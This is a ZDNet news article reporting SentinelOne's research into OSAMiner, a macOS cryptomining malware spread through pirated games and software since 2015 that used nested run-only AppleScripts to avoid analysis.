https://www.zdnet.com/article/macos-malware-used-run-only-applescripts-to-avoid-detection-for-five-years/ * Edition: + Asia + Australia + Europe + India + United Kingdom + United States + ZDNet around the globe: + ZDNet France + ZDNet Germany + ZDNet Korea + ZDNet Japan Search What are you looking for? [ ] Go * Videos * Windows 10 * 5G * CES * Best VPNs * Cloud * Security * more + AI + TR Premium + Working from Home + Innovation + Best Web Hosting + ZDNet Recommends + Tonya Hall Show + Executive Guides + ZDNet Academy + See All Topics + White Papers + Downloads + Reviews + Galleries + Videos + TechRepublic Forums * Newsletters * All Writers * + Preferences + Community + Newsletters + Log Out * * + What are you looking for? [ ] Go * Menu + Videos + Windows 10 + 5G + CES + Best VPNs + Cloud + Security + AI + TR Premium + Working from Home + Innovation + Best Web Hosting + ZDNet Recommends + Tonya Hall Show + Executive Guides + ZDNet Academy + See All Topics + White Papers + Downloads + Reviews + Galleries + Videos + TechRepublic Forums * * + o Preferences o Community o Newsletters o Log Out * us + Asia + Australia + Europe + India + United Kingdom + United States + ZDNet around the globe: + ZDNet France + ZDNet Germany + ZDNet Korea + ZDNet Japan macOS malware used run-only AppleScripts to avoid detection for five years The macOS.OSAMiner has been active since 2015, primarily infecting users in Asia. * * * * * * * Catalin Cimpanu By Catalin Cimpanu for Zero Day | January 12, 2021 -- 14:53 GMT (06:53 PST) | Topic: Security macOS Macbook Apple Image: Bundo Kim For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs. ZDNet Recommends The best antivirus software and apps The best antivirus software and apps A roundup of the best software and apps for Windows and Mac computers, as well as iOS and Android devices, to keep yourself safe from malware and viruses. Read More Named OSAMiner, the malware has been distributed in the wild since at least 2015 disguised in pirated (cracked) games and software such as League of Legends and Microsoft Office for Mac, security firm SentinelOne said in a report published this week. "OSAMiner has been active for a long time and has evolved in recent months," a SentinelOne spokesperson told ZDNet in an email interview on Monday. Also: Best VPNs * Best security keys "From what data we have it appears to be mostly targeted at Chineses/ Asia-Pacific communities," the spokesperson added. Nested run-only AppleScripts, for the win! But the cryptominer did not go entirely unnoticed. SentinelOne said that two Chinese security firms spotted and analyzed older versions of the OSAMiner in August and September 2018, respectively. But their reports only scratched the surface of what OSAMiner was capable of, SentinelOne macOS malware researcher Phil Stokes said yesterday. The primary reason was that security researchers weren't able to retrieve the malware's entire code at the time, which used nested run-only AppleScript files to retrieve its malicious code across different stages. As users installed the pirated software, the boobytrapped installers would download and run a run-only AppleScript, which would download and run a second run-only AppleScript, and then another final third run-only AppleScript. Since "run-only" AppleScript come in a compiled state where the source code isn't human-readable, this made analysis harder for security researchers. Yesterday, Stokes published the full-chain of this attack, along with indicators of compromise (IOCs) of past and newer OSAMiner campaigns. Stokes and the SentinelOne team hope that by finally cracking the mystery surrounding this campaign and by publishing IOCs, other macOS security software providers would now be able to detect OSAMiner attacks and help protect macOS users. "Run-only AppleScripts are surprisingly rare in the macOS malware world, but both the longevity of and the lack of attention to the macOS.OSAMiner campaign, which has likely been running for at least 5 years, shows exactly how powerful run-only AppleScripts can be for evasion and anti-analysis," Stokes concluded in his report yesterday. "In this case, we have not seen the actor use any of the more powerful features of AppleScript that we've discussed elsewhere [1, 2 ], but that is an attack vector that remains wide open and which many defensive tools are not equipped to handle." The IOCs are available in the SentinelOne OSAMiner report, here. The Mac malware most likely to attack your... SEE FULL GALLERY [][screenshot-2019-07-02-a] [][screenshot-2019-07-02-a] [][screenshot-2019-07-02-a] [][screenshot-2019-07-02-a] [][screenshot-2019-07-02-a] [wAAACH5BAE] [wAAACH5BAE] [wAAACH5BAE] 1 - 5 of 8 NEXT PREV Security * Capitol attack's cybersecurity fallout: Stolen laptops, lost data and possible espionage * Cyber security 101: Protect your privacy from hackers, spies, and the government * The biggest hacks, data breaches of 2020 * The best VPNs for business and home use * The best security keys for two-factor authentication * How ransomware could get even more disruptive in 2021 (ZDNet YouTube) * How to improve the security of your public cloud (TechRepublic) Related Topics: Apple Security TV Data Management CXO Data Centers * * * * * * * Catalin Cimpanu By Catalin Cimpanu for Zero Day | January 12, 2021 -- 14:53 GMT (06:53 PST) | Topic: Security Show Comments LOG IN TO COMMENT * My Profile * Log Out | Community Guidelines Join Discussion Add Your Comment Add Your Comment More from Catalin Cimpanu * [][google-chrome-error] Google Google cuts off other Chromium-based browsers from its Sync service * [][kids] Security Linux Mint fixes screensaver bypass discovered by two kids * [][googleplayappleappstore] Security More than 10mil users installed Android apps that showed out-of-context ads * [][dns-over-https-doh] Security NSA warns against using DoH inside enterprise networks Please review our terms of service to complete your newsletter subscription. [ ] By registering, you agree to the Terms of Use and acknowledge the data practices outlined in the Privacy Policy. You will also receive a complimentary subscription to the ZDNet's Tech Update Today and ZDNet Announcement newsletters. You may unsubscribe from these newsletters at any time. [ ] You agree to receive updates, alerts, and promotions from the CBS family of companies - including ZDNet's Tech Update Today and ZDNet Announcement newsletters. You may unsubscribe at any time. By signing up, you agree to receive the selected newsletter(s) which you may unsubscribe from at any time. You also agree to the Terms of Use and acknowledge the data collection and usage practices outlined in our Privacy Policy. Continue Newsletters See All See All Related Stories * 1 of 3 * * [][4-encryption-security-i] AI set to replace humans in cybersecurity by 2030, says Trend Micro In 2021 Trend Micro predicts that cybercriminals will look to home networks as a critical launch pad to compromising corporate IT and IoT networks. * [][kids] Linux Mint fixes screensaver bypass discovered by two kids Two children playing on their dad's computer accidentally found a way to bypass the screensaver and access locked systems. * [][istock-ransomware] Ransomware attacks now to blame for half of healthcare data breaches Almost half of data breaches at hospitals were because of ransomware attacks - and those attacks could've been prevented with timely patching. * [][screenshot-2021-01-15-a] Toyota slapped with $180 million fine for violating Clean Air Act Prosecutors say Toyota failed to comply with the law for a decade. * [][googleplayappleappstore] More than 10mil users installed Android apps that showed out-of-context ads Google has removed all 164 offending Android apps from its official Play Store. * [][xiaomi-mi-10t-pro-5g-ma] Xiaomi added to US list of alleged Communist Chinese military companies Device maker joins a list that includes Huawei, Hikvision, Inspur, Panda Electronics, and Semiconductor Manufacturing International Corporation. * [][dns-over-https-doh] NSA warns against using DoH inside enterprise networks The NSA urges companies to host their own DoH resolvers and avoid sending DNS traffic to third-parties. * [][0-android-krapalm] Xayn introduces user-friendly and privacy-protecting web search Currently, search engines deliver a profiled search experience or an unprofiled-but-private search. Now new privacy app Xayn combines privacy with preference-driven personalization ... * [][tufin-logo-2021] Security software maker Tufin soars on raised Q4 outlook The company named software industry veteran Ray Brancato, formerly of CA Technologies, among others, as its chief revenue officer. ZDNet Connect with us (c) 2021 ZDNET, A RED VENTURES COMPANY. ALL RIGHTS RESERVED. Privacy Policy | Cookie Settings | Advertise | Terms of Use * Topics * Galleries * Videos * Sponsored Narratives * Do Not Sell My Information * About ZDNet * Meet The Team * All Authors * RSS Feeds * Site Map * Reprint Policy * Manage | Log Out * Join | Log In * Membership * Newsletters * Site Assistance * ZDNet Academy * TechRepublic Forums